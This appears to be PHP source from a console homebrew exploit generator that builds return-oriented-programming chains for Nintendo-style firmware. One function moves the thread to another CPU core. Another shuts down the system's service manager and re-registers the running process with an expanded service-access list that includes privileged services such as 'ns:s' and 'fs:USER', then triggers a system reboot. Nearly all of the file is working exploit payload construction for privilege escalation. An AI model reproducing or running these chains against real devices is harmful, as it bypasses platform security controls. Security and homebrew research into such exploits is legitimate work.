function ropgen_switchto_core1()
{
global $ROP_OSGetCurrentThread, $ROP_OSSetThreadAffinity, $ROP_OSYieldThread, $ROP_CALLR28_POP_R28_TO_R31;
ropgen_callfunc($ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, $ROP_OSSetThreadAffinity);
//Set r3 to current OSThread* and setup r31 + the r28 value used by the below.
ropchain_appendu32($ROP_CALLR28_POP_R28_TO_R31);
//ROP_OSSetThreadAffinity(<output from the above call>, 0x2);
ropchain_appendu32($ROP_OSYieldThread);
//r28
ropchain_appendu32(0x0);
//r29
ropchain_appendu32(0x0);
//r30
ropchain_appendu32(0x0);
//r31
ropchain_appendu32(0x0);
ropchain_appendu32($ROP_CALLR28_POP_R28_TO_R31);
ropchain_appendu32(0x0);
//r28
ropchain_appendu32(0x0);
//r29
ropchain_appendu32(0x0);
//r30
ropchain_appendu32(0x0);
//r31
ropchain_appendu32(0x0);
}
function generateropchain_type4()
{
global $ROPHEAP, $ROP_INFINITELP, $POPPC, $POPLRPC, $ROP_POP_R0R6PC, $ROP_POP_R0R8PC, $ROP_STR_R1TOR0, $ROP_POP_R0PC, $SRVPORT_HANDLEADR, $srv_shutdown, $svcGetProcessId, $srv_GetServiceHandle, $srvpm_initialize, $SRV_REFCNT, $ROP_MEMSETOTHER;
//ropchain_appendu32(0x40404040);
//ropchain_appendu32(0x80808080);
ropgen_writeu32($SRV_REFCNT, 1, 0, 1);
//Set the srv reference counter to value 1, so that the below function calls do the actual srv shutdown and "srv:pm" initialization.
ropgen_callfunc(0, 0, 0, 0, $POPPC, $srv_shutdown);
ropgen_condfatalerr();
ropgen_callfunc(0, 0, 0, 0, $POPPC, $srvpm_initialize);
ropgen_condfatalerr();
ropgen_writeu32_cmdbuf(0, 0x4040040);
//Write the cmdhdr.
ropgen_write_procid_cmdbuf(1);
//Write the current processid to cmdbuf+4.
ropgen_sendcmd($SRVPORT_HANDLEADR, 1);
//Unregister the current process with srvpm.
$databuf = array();
$databuf[0x0 * 2 + 0] = 0x3a545041;
//"APT:U"
$databuf[0x0 * 2 + 1] = 0x55;
$databuf[0x1 * 2 + 0] = 0x3a723279;
//"y2r:u"
$databuf[0x1 * 2 + 1] = 0x75;
$databuf[0x2 * 2 + 0] = 0x3a707367;
//"gsp::Gpu"
$databuf[0x2 * 2 + 1] = 0x7570473a;
$databuf[0x3 * 2 + 0] = 0x3a6d646e;
//"ndm:u"
$databuf[0x3 * 2 + 1] = 0x75;
$databuf[0x4 * 2 + 0] = 0x553a7366;
//"fs:USER"
$databuf[0x4 * 2 + 1] = 0x524553;
$databuf[0x5 * 2 + 0] = 0x3a646968;
//"hid:USER"
$databuf[0x5 * 2 + 1] = 0x52455355;
$databuf[0x6 * 2 + 0] = 0x3a707364;
//"dsp::DSP"
$databuf[0x6 * 2 + 1] = 0x5053443a;
$databuf[0x7 * 2 + 0] = 0x3a676663;
//"cfg:u"
$databuf[0x7 * 2 + 1] = 0x75;
$databuf[0x8 * 2 + 0] = 0x703a7370;
//"ps:ps"
$databuf[0x8 * 2 + 1] = 0x73;
$databuf[0x9 * 2 + 0] = 0x733a736e;
//"ns:s"
$databuf[0x9 * 2 + 1] = 0x0;
$databuf[0xa * 2 + 0] = 0x0;
$databuf[0xa * 2 + 1] = 0x0;
$databuf[0xb * 2 + 0] = 0x0;
$databuf[0xb * 2 + 1] = 0x0;
ropgen_writeregdata_wrap($ROPHEAP + 0x100, $databuf, 0, 0x60);
ropgen_writeu32_cmdbuf(0, 0x4030082);
ropgen_write_procid_cmdbuf(1);
//Write the current processid to cmdbuf+4.
ropgen_writeu32_cmdbuf(2, 0x18);
ropgen_writeu32_cmdbuf(3, 0x180002);
ropgen_writeu32_cmdbuf(4, $ROPHEAP + 0x100);
ropgen_sendcmd($SRVPORT_HANDLEADR, 1);
//Re-register the current process with srvpm with a new service-access-control list.
ropgen_callfunc($ROPHEAP + 0xc, $ROPHEAP + 0x100 + 0x9 * 8, 4, 0, $POPPC, $srv_GetServiceHandle);
//Get the service handle for "ns:s", out handle is @ $ROPHEAP+0xc.
ropgen_condfatalerr();
ropgen_writeu32_cmdbuf(0, 0x100180);
ropgen_writeu32_cmdbuf(1, 1);
//flag=1 for titleinfo is set.
ropgen_writeu32_cmdbuf(2, 0);
//programID-low
ropgen_writeu32_cmdbuf(3, 0);
//programID-high
ropgen_writeu32_cmdbuf(4, 2);
//mediatype
ropgen_writeu32_cmdbuf(5, 0);
//reserved
ropgen_writeu32_cmdbuf(6, 0);
//u8
ropgen_sendcmd($ROPHEAP + 0xc, 0);
//NSS:RebootSystem
ropchain_appendu32(0x50505050);
}